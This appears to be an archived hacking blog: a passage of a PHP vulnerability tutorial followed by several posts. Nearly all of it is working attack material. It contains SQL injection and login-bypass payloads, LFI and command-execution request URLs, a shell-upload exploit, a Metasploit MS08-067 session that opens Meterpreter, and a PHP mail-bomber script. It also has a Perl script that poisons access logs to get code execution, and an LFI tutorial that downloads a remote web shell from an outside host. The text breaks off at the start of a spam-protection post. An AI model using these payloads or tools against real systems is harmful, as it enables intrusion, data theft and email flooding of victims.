Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .
Another way : filter "http" , "https" , "ftp" and "smb".

4) Local File Inclusion

- Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).

The same functions which let you to include (include,include_once,require,require_once) .

4.0 - Basic example

- Code snippet from test.php

-----------------------------------
$pagina=$_GET['pagina'];
include '/pages/'.$pagina;
?>
-----------------------------------

Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The script will include "/pages/../../../../../../etc/passwd" successfully.

You can use the %00 and ? .The same story.

4.1 - Simple example

- Code snippet from install/install.php

-------------------------------------
if(empty($_GET["url"]))
$url = 'step_welcome.php';
else
$url = $_GET["url"];
.............etc.............

-------------------------------------

We can see that "url" variable is injectable.If the "url" variable is not set
(is empty) the script will include "step_welcome.php" else will include the
variable set by the attacker.

So if we do the following request :

http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd

The "etc/passwd" file will be succesfully included.

4.2 - How to fix

Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .

5) Local File Disclosure/Download

- Tips : Through this vulnerability you can read the content of files,not include.

Some functions which let you to read files :

file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()

5.0 - Basic example

- Code snippet from test.php

--------------------------------------
$pagina=$_GET['pagina'];
readfile($pagina);
?>
--------------------------------------

The readfile() function will read the content of the specified file.So if we do the following request :

http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd

The content of etc/passwd will be outputed NOT included.

5.1 - Simple example

- Code snippet from download.php

-----------------------------------------------------------------------------------
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");

header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));

//header( "Content-Description: File Transfer");
@readfile($file);
die();
-----------------------------------------------------------------------------------

The "file" variable is unsecure.We see in first line that it is requested by $_REQUEST method.
And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
If we make the following request :

http://127.0.0.1/download.php?file=../../../../../../etc/passwd

So we can succesfully read the "etc/passwd" file.

5.2 - How to fix

Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .

6) SQL Injection

- Tips : If the user have file privileges you can read files.
If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload you code into a file.

6.0 - Basic example

- Code snippet from test.php

----------------------------------------------------------------------------------
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
----------------------------------------------------------------------------------

The "id" variable is not filtered.We can inject our SQL code in "id" variable.Example :

http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--

And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and users have
file privileges.

6.1 - Simple example

- Code snippet from house/listing_view.php

-----------------------------------------------------------------------------------------------------------------------------
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
-----------------------------------------------------------------------------------------------------------------------------

We see that "id" variable value is the value set for "itemnr" and is not filtered in any way.
So we can inject our code.Lets make a request :

http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--

And we get the email and the password from the users table.

6.2 - SQL Injection Login Bypass

- Code snippet from /admin/login.php

------------------------------------------------------------------------------------------------------------------------------
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("

" . mysql_error() . "

\n");
------------------------------------------------------------------------------------------------------------------------------

The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :

username : admin ' or ' 1=1
password : sirgod

We logged in.Why?Look,the code will become

---------------------------------------------------------------------------------------------------------------------------------
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
---------------------------------------------------------------------------------------------------------------------------------

Login bypassed.The username must be an existent username.

6.3 - How to fix

Simple way : Don't allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : - , . ( ) ' " _ + / *

7) Insecure Cooke Handling

- Tips : Write the code in the URLbar,don't use a cookie editor for this.

7.0 - Basic example

- Code snippet from test.php

---------------------------------------------------------------
if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }
---------------------------------------------------------------

Something interesting here.If we set to the "is_user_logged" variable
from cookie value "1" we are logged in.Example :

javascript:document.cookie = "is_user_logged=1; path=/";

So practically we are logged in,we pass the check and we can access the admin panel.

7.1 - Simple example

- Code snippet from admin.php

----------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:
");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
----------------------------------------------------------------

Code looks exploitable.We can set a cookie value that let us to bypass the login
and tell to the script that we are already logged in.Example :

javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";

What is 1246371700? Is the current time() echo'ed + 360.

7.2 - How to fix

Simple way : The most simple and eficient way : use SESSIONS .

8) Remote Command Execution

- Tips : If in script is used exec() you can't see the command output(but the command is executed)
until the result isn't echo'ed from script.
You can use AND operator ( || ) if the script execute more than one command .

In PHP are some functions that let you to execute commands :

exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output

8.0 - Basic example

- Code snippet from test.php

---------------------------------
$cmd=$_GET['cmd'];
system($cmd);
?>
---------------------------------

So if we make the following request :

http://127.0.0.1/test.php?cmd=whoami

The command will be executed and the result will be outputed.

8.1 - Simple example

- Code snippet from dig.php

-------------------------------------------------------------------------------------------
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type
");
echo '

';
system ("dig @$ns $host $query_type");
-------------------------------------------------------------------------------------------

The "ns" variable is unfiltered and can be specified by the attacker.An attacker can use any command
that he want through this variable.

Lets make a request :

http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging

The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and
will not work of course.Lets do something a little bit tricky.We have the AND operator
( || ) and we will use it to separe the commands.Example :

http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging

Our command will be executed.The command become "dig ||whoami|| sirgod.net NS".

8.2 - Advanced example

- Code snippet from add_reg.php

-------------------------------------------------------
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
...................etc......................
$html = " \$regdate = \"$date\";
\$user = \"$user\";
\$pass = \"$pass1\";
\$email = \"$email1\";
\$location = \"$location\";
\$url = \"$url\";
?>";
$fp = fopen($filename, 'a+');
fputs($fp, $html) or die("Could not open file!");
-------------------------------------------------------

We can see that the script creates a php file in "sites" directory( ourusername.php ).
The script save all the user data in that file so we can inject our evil code into one
field,I choose the "location" variable.

So if we register as an user with the location (set the "location" value) :

the code inside sites/ourusername.php will become :

-------------------------------------------------
$regdate = "13 June 2009, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";
$url = "http://google.ro";
?>
-------------------------------------------------

So we will get an parse error.Not good.We must inject a proper code to get the result that we want.

Lets inject this code :

\";?>
So the code inside sites/ourusername.php will become :

--------------------------------------------------------------
$regdate = "13 June 2009, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";?> $url = "http://google.ro";
?>
--------------------------------------------------------------

and we will have no error.Why?See the code :

$location = "";?>
Lets split it :

-------------------------------
$location = "";
?>

-------------------------------

We set the location value to "",close the first php tags,open the tags
again,wrote our evil code,close the tags and open other and add a variable
"xxx" because we dont want any error.I wrote that code because I want no
error,can be modified to be small but will give some errors(will not
stop us to execute commands but looks ugly).

So if we make the following request :

http://127.0.0.1/sites/ourusername.php?cmd=whoami

And our command will be succesfully executed.

8.3 - How to fix

Simple way : Don't allow user input .
Another way : Use escapeshellarg() and escapeshellcmd() functions .
Example : $cmd=escapeshellarg($_GET'cmd']);

9) Remote Code Execution

- Tips : You must inject valid PHP code including terminating statements ( ; ) .

9.0 - Basic example

- Code snippet from test.php

-----------------------------------
$code=$_GET['code'];
eval($code);
?>
-----------------------------------

The "eval" function evaluate a string as PHP code.So in this case we are able to execute
our PHP code.Examples :

http://127.0.0.1/test.php?code=phpinfo();
http://127.0.0.1/test.php?code=system(whoami);

And we will see the output of the PHP code injected by us.

9.1 - Simple example

- Code snippet from system/services/init.php

------------------------------------------------
$conf = array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if ( $_SERVER['HTTP_CLIENT_IP'] )
------------------------------------------------

We see that the "anticode" is requested by $_REQUEST method and the coder
"secured" the input with "stripslashes" which is useless here,we don't need
slashes to execute our php code only if we want to include a URL.So we can
inject our PHP code.Example :

http://127.0.0.1/test.php?anticode=phpinfo();

Great,injection done,phpinfo() result printed.No include because slashes are
removed,but we can use system() or another function to execute commands.

9.2 - How to fix

Simple way : Don't allow ";" and the PHP code will be invalid.
Another way : Don't allow any special char like "(" or ")" etc.

10) Cross-Site Scripting

- Tips : You can use alot of vectors,can try alot of bypass methods,you cand
find them around the web.

10.0 - Basic example

- Code snippet from test.php

---------------------------------
$name=$_GET['name'];
print $name;
?>
---------------------------------

The input is not filtered,an attacker can inject JavaScript code.Example :

http://127.0.0.1/test.php?name=

A popup with XSS message will be displayed.JavaScript code succesfully executed.

10.1 - Another example

- Code snippet from test.php

-------------------------------------------
$name=addslashes($_GET['name']);
print '

';
?>
-------------------------------------------

Not an advanced example,only a bit complicated.

http://127.0.0.1/test.php?name=">

Why this vector?We put " because we must close the " from the "name" atribut
of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.

10.2 - Simple example

- Code snippet from modules.php

---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------

The "name" variable is injectable,input is not filtered,so we can inject
with ease JavaScript code.Example :

http://127.0.0.1/test.php?name=

10.3 - How to fix

Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.

11) Authentication Bypass

- Tips : Look deep in the scripts,look in the admin directories,
maybe are not protected,also look for undefined variables
like "login" or "auth".

11.0 - Basic example

I will provide a simple example of authentication bypass
via login variable.

- Code snippet from test.php

---------------------------------
if ($logged==true) {
echo 'Logged in.'; }
else {
print 'Not logged in.';
}
?>
---------------------------------

Here we need register_gloabals = on . I will talk about php.ini
settings a bit later in this tutorial.If we set the value of $logged
variable to 1 the if condition will be true and we are logged in.
Example :

http://127.0.0.1/test/php?logged=1

And we are logged in.

11.1 - Via login variable

- Code snippet from login.php

------------------------------------------------------------------------------------
if ($login_ok)
{
$_SESSION['loggato'] = true;
echo "

$txt_pass_ok

";
echo"

$txt_view_entry |
$txt_delete-$txt_edit | $txt_install

";
}
------------------------------------------------------------------------------------

Lets see.If the "login_ok" variable is TRUE ( 1 ) the script set us a SESSION who
tell to the script that we are logged in.So lets set the "login_ok" variable to TRUE.
Example :

http://127.0.0.1/login.php?login_ok=1

Now we are logged in.

11.2 - Unprotected Admin CP

You couln't belive this but some PHP scrips don't protect the admin
control panel : no login,no .htaccess,nothing.So we simply we go to
the admin panel directory and we take the control of the website.
Example :

http://127.0.0.1/admin/files.php

We accessed the admin panel with a simple request.

11.3 - How to fix

- Login variable bypass : Use a REAL authentication system,don't check the
login like that,use SESSION verification.Example :

if($_SESSION['logged']==1) {
echo 'Logged in'; }
else { echo 'Not logged in';
}

- Unprotected Admin CP : Use an authentication system or use .htaccess to
allow access from specific IP's or .htpasswd to
request an username and a password for admin CP.
Example :

.htaccess :

order deny, allow
deny from all
allow from 127.0.0.1

.htpasswd :

AuthUserFile /the/path/.htpasswd
AuthType Basic
AuthName "Admin CP"
Require valid-user

and /the/path/.htpasswd

sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.

12) Insecure Permissions

Tips : Look deep into the files,look if the script request to be
logged in to do something,maybe the script don't request.
Watch out for insecure permissions,maybe you can do admin
things without login.

12.0 - Basic example

We are thinking at a script who let the admin to have a lookup in
the users database through a file placed in /admin directory.That
file is named...hmmm : db_lookup.php.

- Code snippet from admin/db_lookup.php

--------------------------------------------
// Lookup in the database
readfile('protected/usersdb.txt');
?>
--------------------------------------------

Lets think.We cannot access the "protected" directory because
is .htaccess'ed.But look at this file,no logged-in check,nothing.
So if we acces :

http://127.0.0.1/admin/db_lookup.php

We can see the database.Remember,this is only an example created by
me,not a real one,you can find this kind of vulnerabilities in scripts.

12.1 - Read the users/passwords

Oh yeah,some coders are so stupid.They save the usernames and passwords
in text files,UNPROTECTED.A simple example from a script :

http://127.0.0.1/userpwd.txt

And we read the file,the usernames and passwords are there.

12.2 - Download Backups

Some scripts have database backup functions,some are safe,some are not safe.
I will show you a real script example :

- Code snippet from /adminpanel/phpmydump.php

--------------------------------------------------------------------------------
function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {
$con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");
$db=@mysql_select_db($dbname,$con) or die("Could not select db");
.............................. etc ..........................
mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
--------------------------------------------------------------------------------

After a lof of code the function is called.I don't pasted the entire code
because is huge.I analyzed the script,no login required,no check,nothing.So
if we access the file directly the download of the backup will start.Example :

http://127.0.0.1/adminpanel/phpmydump.php

Now we have the database backup saved in our computer.

12.3 - INC files

Some scripts saves important data in INC files.Usually in INC files is PHP
code containing database configuration.The INC files can be viewed in
browser even they contain PHP code.So a simple request will be enough to
access and read the file.Example :

http://127.0.0.1/inc/mysql.inc

Now we have the database connection details.Look deep in scripts,is more
scripts who saves important data into INC files.

12.4 - How to fix

- Basic example : Check if the admin is logged in,if not,redirect.

- Read the users/passwords : Save the records in a MySQL database
or in a protected file/directory.

- Download Backups : Check if the admin is logged in,if not,redirect.

- INC files : Save the configuration in proper files,like .php or
protect the directory with an .htaccess file.

13) Cross Site Request Forgery

- Tips : Through CSRF you can change the admin password,is not
so inofensive.
Can be used with XSS,redirected from XSS.

13.0 - Basic example

- Code snippet from test.php

-----------------------------------------
check_auth();
if(isset($_GET['news']))
{ unlink('files/news'.$news.'.txt'); }
else {
die('File not deleted'); }
?>
-----------------------------------------

In this example you will see what is CSRF and how it works.In the "files"
directory are saved the news written by the author.The news are saved like
"news1.txt","news2.txt" etc. So the admin can delete the news.The news that
he want to delete will be specified in "news" variable.If he want to delete
the news1.txt the value of "news" will be "1".We cannot execute this without
admin permissions,look,the script check if we are logged in.
I will show you an example.If we request :

http://127.0.0.1/test.php?news=1

The /news/news1.txt file will be deleted.The script directly delete the file
without any notice.So we can use this to delete a file.All we need is to trick
the admin to click our evil link and the file specified by us in the "news"
variable will be deleted.

13.1 - Simple example

In a way the codes below are included in the index.php file ,I
will not paste all the includes,there are a lot.

- Code snippet from includes/pages/admin.php

--------------------------------------------------------------------
if ($_GET['act'] == '') {
include "includes/pages/admin/home.php";
} else {
include "includes/pages/admin/" . $_GET['act'] . ".php";
--------------------------------------------------------------------

Here we can see how the "includes/pages/admin/members.php" is included in
this file.If "act=members" the file below will be included.

- Code snippet from includes/pages/admin/members.php

----------------------------------------------------------------------------------------------
if ($_GET['func'] == 'delete') {
$del_id = $_GET['id'];
$query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";
$result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");
while ($results2121 = mysql_fetch_array($result2121)) {
$their_role = $results2121['ROLE'];
}
if ($their_role != '1') {
mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error
());
----------------------------------------------------------------------------------------------

We can see here that if "func=delete" will be called by URL,the script will
delete from the database a user with the specified ID ( $id ) without any
confirmation.Example :

http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4

The script check if the admin is logged in so if we trick the admin to click
our evil link the user who have the specified ID in the database will be deleted
without any confirmation.

13.2 - How to fix

- Simple way : Use tokens.At each login,generate a random token and save it
in the session.Request the token in URL to do administrative
actions,if the token missing or is wrong,don't execute the
action.I will show you only how to to check if the token
is present and is correct.Example :

-------------------------------------------------------
check_auth();
if(isset($_GET['news']) && $token=$_SESSION['token'])
{ unlink('files/news'.$news.'.txt'); }
else {
die('Error.'); }
?>
-------------------------------------------------------

The request will look like this one :

http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]

So this request will be fine,the news will be deleted.

- Another way : Do some complicated confirmations or request a password
to do administrative actions.

14) Shoutz

Shoutz to all www.insecurity.ro & www.h4cky0u.org members.If you have some suggestions or
questions just email me.

Ticket Support Script (ticket.php) Remote Shell Upload Vulnerability

2009-09-11T06:49:00.000-07:00

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script :: ticket support system

<<->> download :: http://www.ticketsupportscript.com/download12/TicketSupportScriptU.zip

=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================

<<->> Exploit ::

goto here and send ticket with ur upload shell

::> http://www.site.com/[ path ]/ticket.php?ac=new

ur shell will be here

::> http://www.site.com/[ path ]/uploads/

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

MS08-067

2009-09-11T05:57:00.000-07:00

msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm

Available targets:
Id Name
-- ----
0 Windows XP SP2 English (DEP)
1 Windows XP SP3 English (DEP)
2 Windows 2003 SP0 English (NO DEP)
3 Windows 2003 SP2 English (NO DEP)

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 7 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[\BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)

meterpreter > sysinfo
Computer: Research-1
OS : Windows XP (Build 2600, Service Pack 2).

mail bomber

2009-09-05T06:45:00.000-07:00


<title>Mail bomber</title>
<table><form method=post>
<input type=hidden value=ok name=ok>
<tr><td>Dari<td><input name=dari value="<?echo $dari; ?>">
<tr><td>Kepada<td><input name=kepada value="<?echo $kepada; ?>">

<tr><td>Subject<td><input name=subj value="<?echo $subj; ?>">
<tr><td>Jumlah<td><input name=jumlah value="<?echo $jumlah; ?>">
<tr><td>Besar email (KB)<td><input name=besar value="<?echo $besar; ?>">

<tr><td>Isi Pesan<td><textarea name=pesan><?echo $pesan?></textarea>
<tr><td><input type=submit value=Hajar></form></table>

<?php
$ok        = $_POST['ok'];
$dari    = $_POST['dari'];
$kepada    = $_POST['kepada'];
$jumlah    = $_POST['jumlah'];
$besar    = $_POST['besar'];
$subj    = $_POST['subj'];
$pesan    = $_POST['pesan'];

if ($ok=="ok" ) {
for ($i=0;$i <$jumlah;$i++) {
$a= $i.$dari.$i;
$subject = $subj.$i;
mail( $kepada,$subject,$pesan.str_repeat(" ", 1024*$besar),"From: $a <$a>\r\n" );
} echo ("Selesai Juragan!");
}
exit;
?>

LFI & RCE

2009-09-03T00:46:00.000-07:00

- LFI (Local File Inclusion)
- RCE (Remote Code Execution)

Start !!!

First we must found patch from httpd.conf in apache usually in:

/etc/httpd/conf/httpd.conf

so the exploit form LFI like this :

http://www.example.com/index.php?file=../../../../../../../../../etc/httpd/conf/httpd.conf

now we try to found access.log/access_log in httpd.conf, but remember the name of ServerAlias/web

example :

ServerAdmin webmaster@example1.com
DocumentRoot /home/matthews/httpdocs
ServerName example1.com
ServerAlias www.example1.com
ErrorLog /home/matthews/logs/error.log
CustomLog /home/matthews/logs/access.log common

ServerAdmin webmaster@example2.com
DocumentRoot /home/ander/httpdocs
ServerName example2.com
ServerAlias www.example2.com
ErrorLog /home/ander/logs/error.log
CustomLog /home/ander/logs/access.log common

Exploit:

http://www.example.com/index.php?file=../../../../../../../../../home/matthews/logs/access.log

or

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log

and then , you can save this perl script:

#==========================================================================================

use IO::Socket::INET;

my $host = $ARGV[0];
print "\n [*] Injecting Apache Access Log ...\n";
$sock = IO::Socket::INET->new(PeerAddr => $host, PeerPort => 80, Proto => "tcp") || die " [!] Can't connect to $host:80!\n";
my $matthews = "";
print $sock "GET /matthews.m0de.0n ".$matthews." HTTP/1.1\r\n";
print $sock "Host: ".$host."\r\n";
print $sock "Connection: close\r\n\r\n";
close($sock);

print " [*] Done ...\n";

#==========================================================================================

and then save to your PC (matthews.txt)

open cmd and write :

perl natthews.txt www.example1.com <----- kalo yang mau di inject /home/matthews/logs/access.log
perl matthews.txt www.example2.com <----- kalo yang mau di inject /home/ander/logs/access.log

example

C:\xpl>perl matthews.txt www.example2.com

[*] Injecting Apache Access Log ...
[*] Done ...

if you don't have perl in your computer, you can use manually:

write in console:

telnet www.example1.com 80
GET /matthewa.m0de.0n HTTP/1.1

next

if you inject www.example2.com, then access.log that we open.

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log

wait untill loading finish..... and try to find string "matthews.m0de.0n"
if it works, like this :

"GET /matthews.m0de.0n
Warning: system() [function.system]: Cannot execute a blank command in /home/ander/logs/access.log on line 709

look this string "Cannot execute a blank command" <----- make sure they can RCE :D
for RCE exploit , like this:

http://www.example.com/index.php?file=../../../../../../../../../home/ander/logs/access.log&matthews=[CMD]

finish

my blog : http://matthews-diablo.blogspot.com

thank's for c0li.m0de.0n

Shell via LFI - proc/self/environ method (step by step)

2009-08-28T06:58:00.000-07:00

This article take from http://h4cky0u.org/shell-via-lfi-proc-self-environ-method-step-by-step--t1101.html , so enjoy this article, only for education, thanks for SirGod contact person : sirgod08[at]gmail[dot]com

1 - Introduction
2 - Finding LFI
3 - Checking if proc/self/environ is accessible
4 - Injecting malicious code
5 - Access our shell
6 - Shoutz

>> 1 - Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.

>> 2 - Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.

www.website.com/view.php?page=contact.php

- Now lets replace contact.php with ../ so the URL will become

www.website.com/view.php?page=../

and we got an error

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

big chances to have a Local File Inclusion vulnerability.Let's go to next step.

- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

www.website.com/view.php?page=../../../etc/passwd

we got error and no etc/passwd file

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go more directories up

www.website.com/view.php?page=../../../../../etc/passwd

we succesfully included the etc/passwd file.

root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

www.website.com/view.php?page=../../../ ... lf/environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.

>> 4 - Injecting malicious code

- Now let's inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :

www.website.com/view.php?page=../../../ ... lf/environ

Choose Tamper and in User-Agent filed write the following code :

Then submit the request.

Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don't work,try exec() because system() can be disabled on the webserver from php.ini.

>> 5 - Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

www.website.com/shell.php

Our shell is there.Injection was succesfully.

>> 6 - Shoutz

Shoutz to all members of www.insecurity-ro.org and www.h4cky0u.org.

How to Protect an Email Account from SPAM

2009-08-26T20:27:00.000-07:00

Most of us get SPAM every day. Some of us get more and some little. Even a newly created email account will begin to receive spam just after a few days of it’s creation. Many times we wonder where these spam come from and why? But this question remains unanswered within ourselves. So in this post I will try my best to give every possible information about the spam and will also tell you about how to combat spam.

What is SPAM?

Spam is the abuse of electronic messaging systems (including most broadcast media, digital delivery systems) to send unsolicited bulk messages indiscriminately. Most widely recognized form of spam is email spam.

Where do these SPAM come from?

